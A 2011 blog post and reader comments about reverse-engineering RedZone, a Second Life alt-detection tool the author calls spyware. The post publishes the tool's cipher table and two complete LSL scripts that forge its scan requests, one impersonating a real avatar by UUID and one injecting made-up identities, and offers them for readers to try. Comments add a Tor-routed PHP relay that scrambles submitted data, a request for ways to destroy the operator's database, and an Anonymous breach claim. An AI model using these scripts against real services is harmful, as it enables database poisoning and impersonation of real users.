Adventures With RedZone

10 02 2011

In a message yesterday I explained how RedZone is exploiting the Parcel Media security hole in the Second Life Client software to make your browser silently send customised and personalised HTTP GET requests back to the isellsl.ath.cx website. When I became aware that someone was using RedZone in a dance club sim I had entered (bad owner! How are we supposed to keep our media disabled in such places?) I decided to investigate what was being sent back to base.

The first thing I did was to fire up wireshark (formerly known as ethereal). Wireshark is an amazingly useful tool – a graphical form of the equally useful tcpdump. It allows you to monitor traffic on any and all of your network interfaces, and is invaluable for diagnosing network performance issues and other network administarion tasks.

In this case I knew what RedZone must be doing so all I needed to really look for was HTTP traffic. I applied a filter and logged into the dance club, enabling my media. Almost immediately I captured a TCP stream with a dodgy looking get request, which on analysis with wireshark (choose “analyse/follow TCP Stream”) looked like this:

The Output Window of Wireshark

Wireshark Packet Capture

Some things struck me right away:

1. The stream is unencrypted. It has to be, being vanilla HTTP. I do not think a secure stream using TLS is likely, because the Second Life client would need a certificate exchange. A self signed certificate would raise the exact security warning that the spyware writers want to avoid. Commercial certificates would be expensive, hard and subect to revocation, if users threatened the Certification Authority to revoke their certificates because it is being used for spyware. So vanilla HTTP it will stay.

2. The variables being passed are quite guessable. Let’s look at these:

– The n variable looks like an SL name. It is clearly encrypted, but that space in the name appears where the unencrypted space appears in my real name.

– The o, j and d variables appear to be the same length as UUIDs and the r values appear where the – should appear in UUIDs.

– Some of the information is unencrypted and is clearly information about my avatar age and payment information.

– The e variable is always “pscan” although its existence suggests some other kind of control URLs that may be possible

– The location is your location (more or less), not the location of the RedZone device. It may be the location of the flying probe RedZone uses to get around the 96 metre scan range problem. These probes, by the way, can cause lag.

Having discovered this scan URL I immediately applied the quick and dirty fix I described before. I added this to my hostfile:


127.0.0.1 isellsl.ath.cx

This would ensure I would capture all future packets meant for the spyware collector. (Actually I used an IP address of my LAMP server, rather than localhost. But for the explanation I will just assume I did it all on my laptop).

Now whilst that entry alone kills RedZone, I was curious about that data being passed. So I immediatley wrote my own capture script called rz2.php and placed it on my own server. This script does a few things:

1. It emails me an alert any time I enter a RedZoned sim.
2. It saves a copy of the offending HTTP request
3. It inserts the data into my own database so that I can build a database of RedZone sims I visit automatically

Now armed with data capture facilities, I logged in an alt. I then looked at what I collected and discovered some fundamental weaknesses. Most notably, this encryption is the most brain dead I have ever seen.

Really!

It is quite clear that the RedZone author does not really understand security. I could educate him how to fix this – but I don’t wish to unless he first gets a clue about collation of personal data. I could make a better RedZone myself without the flaw – but I am not amoral, and I choose to obey the law.

Nevertheless, cracking the encryption was a doddle. This is basically a simple monoalphabet substitution cipher. I did not even need a computer – a paper and pen was almost enough to crack it when I first saw it. However, I was missing a few letters. Most of the missing letters were guessable, and those that were not were recoverable by logging in alts with those letters in their name.

Here is the cipher used. The first line is the clear text character, the second line the substituted character:

 -0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
 rzmnCXZbvcx09876POIUY54321pTREWQoiuyLKJHGtewqlFDSAkjhgMNBVfds-a

Now I could decrypt the packets, I quickly modified my PHP code to decrypt what I was seeing. I now had UUIDs and my avatar name decrypted, I was quickly to see that of the UUID variables, “d” was my own UUID and “o” was the UUID of the owner of the RedZone that was scanning me. I linked this with an online key2name database to show me the owners of all RedZones I find. I am not sure yet what j is, although I somewhat suspect it is the UUID of the prim of the RedZone device sending the record, as it certainly never changes for any particular RedZone site.

Now then. What could I do with this information?

Well one big question: What would happen if I sent back my own response to RedZone using data about some other avatar? The problem is: how would I know it had worked? I will not buy RedZone, so how would I know if that other user was now listed as my alt? I would clearly need the user’s permission too.

The solution was to find someone listed as a copybot (and thus banned on all RedZoone sims) or some other banned person and ask if they minded me experimenting in this way. Finding the user was not hard – I just looked at ban lists in various RedZone sims and looked the user up in the RedZone site’s neighbourhood watch until I found a candidate. I then spoke to them about what I planned and with their permission, I logged in an alt of mine on a nice fresh IP address and wrote the script below to deliver the payload:

integer listen_handle;
integer channel=1 ;
string clearText= " -0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" ;
string cipherText=" rzmnCXZbvcx09876POIUY54321pTREWQoiuyLKJHGtewqlFDSAkjhgMNBVfds-a" ;
string newText="" ;
key keyname;
key keyborn ;
key keypayinfo ;
string myname="";
string encname="" ;
string myborn="";
string myuuid="";
string mypayinfo="" ;
key avquery ; 
list allbits=["&o=z0vmX8P0r8cmxrX8P9r98v0r0bbCbcxmc67n","&l=Vsevolod/148/59/115&j=6Pzc7xxbrvPnxrvX8nr8czcrcPcnzXb6zv7Z",
    "&o=z0vmX8P0r8cmxrX8P9r98v0r0bbCbcxmc67n","&l=Whitmyre/168/61/22&j=0nb8xbbmr6cvbr87xcrXXv9rb6n8c89ZvPvz" 
];
string myurl="http://isellsl.ath.cx/rz2.php?e=pscan" ;
string obit ;
string locbit ;
//
string substitute(string baseChar, string clearText, string cipherText) {
    string ss="" ;
    integer pos = llSubStringIndex(clearText,baseChar) ;
    ss=llGetSubString(cipherText,pos,pos) ;
    if (ss==" ") ss="%20" ;
    return ss ;
}
//
string encrypt(string plainText) {
    integer i ;
    string  resultStr="" ;
    integer ptlen = llStringLength(plainText) ;
    for ( i=0 ; i<ptlen ; i++ ) {
      resultStr+=substitute(llGetSubString(plainText,i,i),clearText, cipherText) ;
    } 
    return resultStr ;
}
//
string decrypt(string nonplainText) {
    integer i ;
    string  resultStr="" ;
    integer ptlen = llStringLength(nonplainText) ;
    for ( i=0 ; i<ptlen ; i++ ) {
      resultStr+=substitute(llGetSubString(nonplainText,i,i),cipherText, clearText) ;
    } 
    return resultStr ;
}
//   
default
{
    state_entry()
    {
        listen_handle = llListen(channel, "", llGetOwner(), "");
        llOwnerSay("Starting: Type /1 SL-User-UUID  to create a RedZone poison URL for that user") ;
    }
//
    listen( integer channel, string name, key id, string message )
    {

        allbits=llListRandomize(allbits,2) ; // allbits is a stride 2 list
        obit=llList2String(allbits,0) ;
        locbit=llList2String(allbits,1) ;
        myuuid=message ;
        keyname=llRequestAgentData((key) message,DATA_NAME ) ;
        keypayinfo=llRequestAgentData(message,DATA_PAYINFO) ;
        keyborn=llRequestAgentData((key) message,DATA_BORN) ;
    }
//    
    dataserver(key queryid, string data)
    {
        if ( keyname == queryid )
        {
            myname = data;
            llOwnerSay("Cloning : " + myname); 
            encname=encrypt(myname) ;
            myurl+="&n=";
            myurl+=encname ;
            myurl+=obit ;
            myurl+="&d=" ;
            myurl+=encrypt(myuuid) ;
            myurl+=locbit;
            
        }
//
        if ( keypayinfo == queryid )
        {
            mypayinfo = data ;
            if (mypayinfo=="1") {
                myurl+="&p=yes&g=0" ;
            }
            else {
                myurl+="&p=no&g=0" ;
            }
//           
        }
        
        if ( keyborn == queryid )
        {
            myborn = data ;
            myurl+="&age=" ;
            myurl+=myborn ;
            llOwnerSay(myurl) ;
            myurl="http://isellsl.ath.cx/rz2.php?e=pscan" ;
        }
    }
//    
    on_rez(integer param)
    {   
        llResetScript();//By resetting the script on rez forces the listen to re-register.
    }
    changed(integer mask)
    {   
        if(mask & CHANGED_OWNER)
        {
            llResetScript();
        }
    }
}

It worked like a dream. RedZone immediately informed me this user was banned. I was also able to send real data about my alt and get the alt banned too, because now we shared an IP address.

So yes the code above will insert data into the RedZone database.

One question: Will the data stay in the database? If I were to insert hundreds of people into the database all from my IP address, would it be possible to write a data cleansing algorithm to remove these values?

Certainly it would. A whole IP address could be written off as giving false data – although it is likely that it would write off any real alts listed under that addess at the same time – particularly if you were careful not to register hundreds of alts all at once.

Sadly it would cause innocent people problems with duped RedZone owners to add hundreds of alts of real users to the database. So here is a fun variation on the above code: Instead of entering real SL users, what if you entered some random data instead? Make up a name, and the associated alt data, generate a random UUID and enter this?

You see, the RedZone database is not an inworld database. There is no offline complete list of avatars and UUIDs (although there are some very large name2key databases). So when you report your information to the RedZone database, it presumably has to believe you! In this way you can enter a huge number of “alts” (and share them with your friends if you wish), and have a good laugh the next time someone comes to you (as they came to me) and tells you “I know all your alts”.

May I ask you though, if you are trying this at home: please do not use the data of real users without their permission. Just because RedZone messes with people, does not mean we should to.

Remember these random users will enter the database with YOUR IP address. Of course, to add them with someone elses IP address, just ask them to click the link too. Make sure you tell them what the link does so they can make an informed choice about it.

integer listen_handle;
integer channel=1 ;
string clearText= " -0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" ;
string cipherText=" rzmnCXZbvcx09876POIUY54321pTREWQoiuyLKJHGtewqlFDSAkjhgMNBVfds-a" ;
string newText="" ;
key keyname;
key keyborn ;
key keypayinfo ;
string myname="";
string encname="" ;
string myborn="";
string myuuid="";
string mypayinfo="" ;
key avquery ; 
list allbits=["&o=z0vmX8P0r8cmxrX8P9r98v0r0bbCbcxmc67n","&l=Vsevolod/131/65/110&j=6Pzc7xxbrvPnxrvX8nr8czcrcPcnzXb6zv7Z",
    "&o=z0vmX8P0r8cmxrX8P9r98v0r0bbCbcxmc67n","&l=Whitmyre/124/41/22&j=0nb8xbbmr6cvbr87xcrXXv9rb6n8c89ZvPvz" 
];
string myurl="http://isellsl.ath.cx/rz2.php?e=pscan" ;
string obit ;
string locbit ;
//
string substitute(string baseChar, string clearText, string cipherText) {
    string ss="" ;
    integer pos = llSubStringIndex(clearText,baseChar) ;
    ss=llGetSubString(cipherText,pos,pos) ;
    if (ss==" ") ss="%20" ;
    return ss ;
}
string encrypt(string plainText) {
    integer i ;
    string  resultStr="" ;
    integer ptlen = llStringLength(plainText) ;
    for ( i=0 ; i<ptlen ; i++ ) {
      resultStr+=substitute(llGetSubString(plainText,i,i),clearText, cipherText) ;
    } 
    return resultStr ;
}
string decrypt(string nonplainText) {
    integer i ;
    string  resultStr="" ;
    integer ptlen = llStringLength(nonplainText) ;
    for ( i=0 ; i<ptlen ; i++ ) {
      resultStr+=substitute(llGetSubString(nonplainText,i,i),cipherText, clearText) ;
    } 
    return resultStr ;
}
//    
default
{
    state_entry()
    {
        listen_handle = llListen(channel, "", llGetOwner(), "");
        llOwnerSay("Starting: Type /1 name=Random Name") ;
        llOwnerSay("Type /1 age=Random Name in format yyyy-mm-dd e.g. 2010-09-26") ;
        llOwnerSay("Type /1 uuid=Random uuid. Try http://www.famkruithof.net/uuid/uuidgen ") ;
        llOwnerSay("Type /1 go") ;
        llOwnerSay("Click the URL to add a random nobody to Redzone") ;
    }

    listen( integer channel, string name, key id, string message )
    {
        list msg=llParseString2List(message,[" ","="], []);
 
        if (llList2String(msg, 0)=="name") {
            myname=llList2String(msg,1)+" "+llList2String(msg,2) ;
            llOwnerSay("Name set to "+myname) ;
        }  
        else if (llList2String(msg, 0)=="age") {
            myborn=llList2String(msg,1);
            llOwnerSay("Age set to "+myborn) ;
        }
        else if (llList2String(msg, 0)=="uuid") {
            myuuid=llList2String(msg,1);
            llOwnerSay("Uuid set to "+myuuid) ;
        }
        else if (llList2String(msg, 0)=="go") {
            allbits=llListRandomize(allbits,2) ; // allbits is a stride 2 list
            obit=llList2String(allbits,0) ;
            locbit=llList2String(allbits,1) ;
            myurl="http://isellsl.ath.cx/rz2.php?e=pscan" ;
            myurl+="&n=";
            myurl+=encrypt(myname) ;
            myurl+=obit ;
            myurl+="&d=" ;
            myurl+=encrypt(myuuid) ;
            myurl+=locbit;
            myurl+="&p=no&g=0" ;
            myurl+="&age=" ;
            myurl+=myborn ;
            llOwnerSay(myurl) ;
            
        }        
    }   
    on_rez(integer param)
    {   // Triggered when the object is rezzed, like after the object has been sold from a vendor
        llResetScript();//By resetting the script on rez forces the listen to re-register.
    }
    changed(integer mask)
    {   // Triggered when the object containing this script changes owner.
        if(mask & CHANGED_OWNER)
        {
            llResetScript();
        }
    }   
}

So in summary: RedZone is an extremely naΓ―ve system. Its reliance on IP addresses and User Agents to identify alts and copybotters respectively is foolish and wrongheaded. The way data is passed to the server would get no marks at all in a class on building secure web based systems. (Ok, maybe half a mark for the substitution cipher. At least the writer thought about it). The potential for causing havoc with this database is huge.

Better and more secure systems are certainly possible. This one is really an object lesson in how not to write your spyware.

Advertisements

Actions

Information

28 responses

11 02 2011
cool_on_the_corner

I say link all users of redzone to known copybotters as alts. Let the people supporting a hacker feel what it is like to have their second life disrupted.
Then people can look on the data base andthen at each other thinking they are griefers or copybots. The notion that everyone gives up their IP is a joke. I use a proxy so that I have that buffer between me and people snooping in my computer. Now if I could do so in SL even better since this redzone spyware is in second life. We do not need dishonest people like the maker of redzone poking his nose in our computers. Any one know how to send a bad bug back into his server and destroy his database? if he wants to hack our computers…. what is good for the gooose is good for the gander.

11 02 2011
Azure Twine

The first rule of hacking s “don’t talk about hacking”:)

Instead of making this info so public, it probably would have best been served used in an intelligent, sparing manner. Now redzone asshat knows we know how he does things so he will likely change it up. Its like giving information to the enemy.

And yeah we broke his lame ass cypher quickly too. I mean he at least could have used md5 encryption like all the other amatuers. It is surprising to me how much of the stream is in plain text. Why encrypt some and not all?

11 02 2011
Karen

it’s funny to hear redzones customers worried about privacy issues with the product that they own.
http://isellsl.ath.cx/madsci/forum/viewtopic.php?f=12&t=378

11 02 2011
no2redzone

Azure, yes, I understand that viewpoint. But I am not a hacker, I was merely experimenting with a site that seemed to be offering me media content but no such content ever arrived. I am no hacker πŸ˜‰

Now what is the intelligent manner to use the information I discovered? If I make it public it is clear to even Redzoneophiles that their system is broken. That all those people listed as alts are quite possibly just random data inserted into the system.

Yes it alerts zFire to the problem. But in fact he knows already. There have several times been threads on the RedZone forums about his database having been hacked. On each occasion, rather than improve his lame software, he has simply deleted the threads (and somehow shut up the complainers – perhaps with product refunds).

I rather like the idea that people know what zFire has been hushing up.

Karen, yes I was amused by that link too.

11 02 2011
Laura

Guys.. guys…. zFire is a genius! Just admit it. You need to get a life, seriously, and stop slandering zF RedZone. It works, it’s effective, and it protects us – content creators – from hackers and thieves like you.
Cheers!

11 02 2011
no2redzone

Thank you for the laugh Laura. I notice that zFire is defending RedZone in his own forums by posting up some kind of evidence that someone I don’t know is or was involved in copybot activities. I further notice that he discovered this information NOT using Redzone, but the way all intelligent people do it – by inspecting objects.

RedZone does not detect copybots. It detects user agent strings. That is why people have been mislabelled as “copybots” and banned on all RedZone sims simply because they compiled a client from source code! (which is allowed). Whereas people actually using hacked clients ensure that the user agents are correct, and thus are not caught by RedZone.

Banning people for messing with their user agent string amounts to griefing in my book.

But if you had even bothered to consider this post you would realise by now that RedZone is ineffective. If you ban someone it is trivial for them to appear to be the alts of all your real guests. This is extremely dangerous for you if you use RedZone. I strongly advise you do not use the option in RedZone to ban matching alts. It will only get you into trouble.

11 02 2011
Karen

Another thing is that LL does warn you about two things concerning media. If you install a new viewer LL warns you that having play media can leave you open to problems. The other is playing streaming media uses more bandwidth and can slow down your performance. So people wishing to have their computers run faster and safer in SL would of course leave all media turned off.
With redzones ban people with media turned off option, content makers are only hurting themselves by useing this to turn away people with slower computers or that decided to heed LL warning about having media enabled.
The the angry person who was banned for not having media turned on only hurts them more when this person bad mouths the place banning them for no apparent reason and more people either do not visit their sim or if they do, they come back with friends and grief it making their nightmars become a reality.
If a sim is using this hack to invade my computer, then I have no desire to be there. is there a way to warn people prior to teleporting that the sim they wish to enter has this system beforehand? it would save a lot of wasted time.

11 02 2011
Tay

Hey, I was trying to add some random generated fake names to add to my rz alt list but came across this problem when clicking the link

“GMytdbn kzpplVMb~vsc3Lh3bRbcLzRshu8Rx9vbR2uxh2bbHsb3b~Visitor~no~Secondlife.~1~0~ Fatal error: Cannot break/continue 1 level in /Library/WebServer/Documents/rz2.php on line 47”

Ive copied the code above to a script and rezzed it in a box, added the fake info on /1 and click the link it gives me. Any help you can give? Thanks.

11 02 2011
no2redzone

Hi Tay, nothing wrong with the code. The PHP script at the RedZone server end is hitting a break because zFire is desperately working on his server to try and plug the hole.

The good news, whilst only temporary, is that this almost certainly means that all RedZones are currently failing to collect any data, and presumably will continue to fail until zFire rolls out his next update.

11 02 2011
txwalrus

I wonder if they are moving to a new domain… this on the home page of http://isellsl.ath.cx/

“Welcome to the NEW iSellSl.com
We are moving here, and merging the old site. =)”

My hosts file is updated already!!

11 02 2011
txwalrus

Quick followup: http://isellsl.com redirects to http://isellsl.ath.cx/

11 02 2011
Tay

Hahaha, well thats a small step in the right direction. Thanks for the quick answer. I hope whenever zFire does update it you can share the code again. I recently found out from a “friend” (use the term loosely cause he only talks to me to show off or when he wants something) who has rz on his sim that I have 9 alts according to him and proceeded to list them off to me. Granted, all 4 of my alts were in the list, it also had attached 5 other names. When I told him, his words “Well it found your alts.”

He was perfectly fine with this less than 50% accuracy on this thing, and I know he’s shared “my alts” with at least one other person, probably others. Pretty much anyone on his friends list can inquire about someone and he’ll share any alts attached to name just to feel powerful. It blows my mind that people with legitimate business in SL would accept this kind of accuracy and invasion of privacy to their customers.

To zFire, who no doubt reads this: You can keep plugging the holes but it doesn’t change the fact your ship is sinking. The Jiras against it rise in votes daily. GZ is spreading like wildfire. Abandon it before you squander the ridiculous amount of money you’ve made off an unreliable stalker tool.

12 02 2011
Florimel Enderfield

Well, just a few comments.

1. Adding totally synthetic identities to zFire’s database. Who really cares about that? Doing that does nothing that makes RedZone’s unreliability noticeable to zFire’s co-conspirators. Doesn’t cause them any problems. Doesn’t cause them to receive any complaints. Doesn’t cause them to go screaming to zFire about RedZone banning large masses of people en mass. The only thing it does is cause zFire’s server to use a bit more storage space and given the size and cost of modern disk drives, I seriously doubt that he’ll even notice.

2. There is one attack avenue that we can do in addition to GreenZone, the JIRA’s in progress, etc. And it does meet the ethical standards of the ‘don’t harm innocents’ crowd. Namely the fact that RedZone uses the media security hole to correlate alts together is a red herring. Send in ARs on zFire for violating privacy. And the sweet thing is that zFire really can’t claim that there’s *any* reason for RedZone to report alt associations. Look at it this way.

The fact that multiple avatars are associated with the same real life person is private information that you have a reasonable expectation to remain private. It doesn’t matter how that association is achieved. It could be from zFire being an extremely personable individual who chats in IM with thousands of people. It could be from being an expert user of a ouija board. It could be from a large number of highly trained psychic monkeys. Or it could be and an exploited security hole in the Second Life media system. The means of making that association is irrelevant. The disclosure of the associations is in direct violation of the 8.2(v) of the Linden Labs Terms of Service.
Now if it’s in violation of the ToS for zFire to manually disclose the associations, is it not also in violation for him to make such disclosures automatically?
And in what way does making those disclosures support the publicly claimed purpose of RedZone?

Is it needed for banning the alts of a griefer?
Nope. It’s entirely possible to have the “griefer alt” ejected from the sim without giving any notice as to the identity of the original banned avatar.

Is it needed for banning copybots?
Nope. Once again, it’s entirely possible to eject a copybot without revealing the identity of the copybot’s other avatars.

Now as you all know, it’s trivial to bypass RedZone and avoid being detected as an alt. And the battle to rid Second Life of that abomination and close the security hole that allowed it to be created needs to go on.
But also, let’s see about having a couple of thousand ARs submitted on zFire. Since that … creature … doesn’t seem to understand the concept of privacy and since he continues to violate the privacy expectations of Second Life users. He really should be appropriately thanked for his actions. And the appropriate should be everyone submitting an AR on him so that the Lindens of Second Life can fully realize what a fine upstanding gentleman he really is. And hopefully, in rewarding him for his public service arrange for him to no longer have to sully his hands on a keyboard to interact with other Second Life residents.

12 02 2011
Jenni Darkwatch

FYI, there might be a fairly amusing way to royally mess up RZ. Provide a free way to redirect the request through an anonymizing proxy that scrambles the data.

Then everyone would simply appear as everyone elses alt. TOR would be an easy choice for that, _IF_ SL uses the proxy settings for media, which I don’t know.

However, the only true way to fix any such sillyness would be to incorporate some kind of trust mechanism into the client. Technically doable already, just a fair amount of work.

12 02 2011
Jenni Darkwatch

Actually, just did what I suggested, to a point.

On my web server I hosted this PHP file:

For testing I used a valid user client string though, not a bogus one. Then redirected requests there with the same hosts method you used. Voila. RZ got bogus info about IP, client, OS… thus breaking the alt detection. I didn’t mess with changing the URI values around as they’re available by script anyway.

13 02 2011
Wowzie Howzie

Okay, I can’t seem to make this work. I mimicked a client and sent URL’s to the server but they weren’t detected as alts. I tried using a RZ that was in another sim, by using local people there but could not get me linked to them. Have you continued your research?

13 02 2011
no2redzone

Wowzie, as expected, as soon as I published this article, zFire moved to partially plug the security hole. For about a day, no RedZones were recording anything, and various other things seem to have been broken. They are recording again, and zFire has clearly made some move to verify input.

This, of course, is why some people are upset I published the information here. On the other hand, I don’t think it will be hard to work around the fix again. The question is whether I should do so myself, and publish – allowing zFire to fix his braindead software again, or whether I should leave it to someone else.

I’ll leave that to readers to decide. I am happy to further my research, but the point of this posting was primarily to show how broken RedZone has been from its inception.

13 02 2011
Magnuz Binder

Well, I wouldn’t mind you giving zFire some more exercises to have him improve his next to non-existant programming skills another few 100 %. I mean, he’s already advanced to using ciphers invented by the old Romans.

I’m not surprised he found the time off from his patching to add to the laughs on these forums with his presence though. After someone explained to him, in one and two syllable words, what the new Linden Labs CEO’s views on privacy means to his spyware in the very near future, he probably realized it was better use of time to do like former Iraqi minister of information, Mohammad Said Sahhaf, and explain he is winning the war, hopefully convincing at least a few more scam victims to fill his pockets, while his little empire is tumbling down.

13 02 2011
Krise Shepherd

really nice article πŸ™‚ i am interested in your php script and the approach you used inside SL to scan and log the rz SIMS, i want to do the same, and will contact you in world regarding this.

one thing though: the hosts entry trick wont work, if the user is behind a proxy and did not disable the ip that is set in hosts (e.g. 127.0.0.1). My friend who tried it was using a proxy and still could see that webpage in her browser after editing the hosts file, only disabling the proxy made the page be unaccessible.

greetings
Krise

13 02 2011
Wowzie Howzie

I say do it… I see this morning the encryption mechanism has changed in the new version.

14 02 2011
Sextan Shepherd

Greetings.

I am a content creator, but first of all I have a moral and an ethic and I reacan’t understand how people with a “creative mind” can use this RZshit. Thanx NO2 for this blog and for letting us know about what you found out.

15 02 2011
Someone's Alt

To avoid being scanned by RedZone, add the following entries to your host file.

127.0.0.1 isellsl.ath.cx
127.0.0.1 isellsl.com
127.0.0.1 girlsofthevip.com
127.0.0.1 hamlinpro.com

You can find the file here (WinXP – Win7): C:\WINDOWS\system32\drivers\etc\hosts

There’s currently a hot discussion on the SL Universe Forums about this…
http://www.sluniverse.com/php/vb/general-sl-discussion/55250-how-stop-zf-redzone.html

Thanks πŸ™‚

17 02 2011
Jenni Darkwatch

Sorry for the late reply… i don’t read this forum all too regularly. I’d be happy to post the script on the Marketplace, or send it in-world if need be. This comment board does seen to take exception to the code πŸ™‚

Anyway, here’s another try on pasting the code, sans opening and closing tags. I set up my apache to answer to the various domains listed a few posts above me and redirect every request to this PHP snippet.

Fair warning, this does ONLY randomize your IP and “Viewer Version”. Seems to work fine. πŸ™‚

—begin—
// Requires CURL to be installed
$agents=array(
“Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070605 [Second Life 1.18.2.1]”,
“Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070605 [Second Life (Second Life Release) – 1.18.2.1]”,
“Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080314 SecondLife/1.20.13.0 (Second Life Release; default skin)”,
“Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.4 (KHTML, like Gecko) SecondLife/2.6.0.4 (Kirstens S21; default skin) Safari/5”,
“Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.13) SecondLife/1.5.2.818 (Phoenix Viewer Release; light skin)”,
“Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.21) Gecko/20090305 SecondLife/Emerald Viewer (default skin)”
);
$URI=$_SERVER[“REQUEST_URI”];
$ch=curl_init(“http://isellsl.ath.cx”.$URI);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_PROXY, “http://localhost:9050”);
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS4);
curl_setopt($ch, CURLOPT_USERAGENT, $agents[rand(0,count($array)-1)]);

if( !$data=curl_exec($ch)) { // $data is never used, though could save it for recon
trigger_error(curl_error($ch));
}
curl_close($ch);
—end—

5 03 2011
Babaloo

Redzone will have to start over again very soon. Major attack on hands.
More info released soon.

5 03 2011
no2redzone

I am not sure what you mean, although of it is what I suspect, you need to be aware that (1) That is sith magic. Do not cross to the dark side, and (2) bear in mind he has backups. Having him restore and fix will not help.

13 03 2011
Babaloo

http://alphavilleherald.com/2011/03/zf-redzone-security-breached-sl-passwords-compromised.html

———————————————————————–
We are Anonymous We are Legion, We do not Forgive, We Do Not Forget

14 03 2011
zf Redzone User Passwords Hacked « Herk's Lab

[…] “sakurity” for months. For example, detailed instructions on cracking his database are here and here. Anyone with a background in networking, security, or even web development would find it […]

18 03 2011



%d bloggers like this: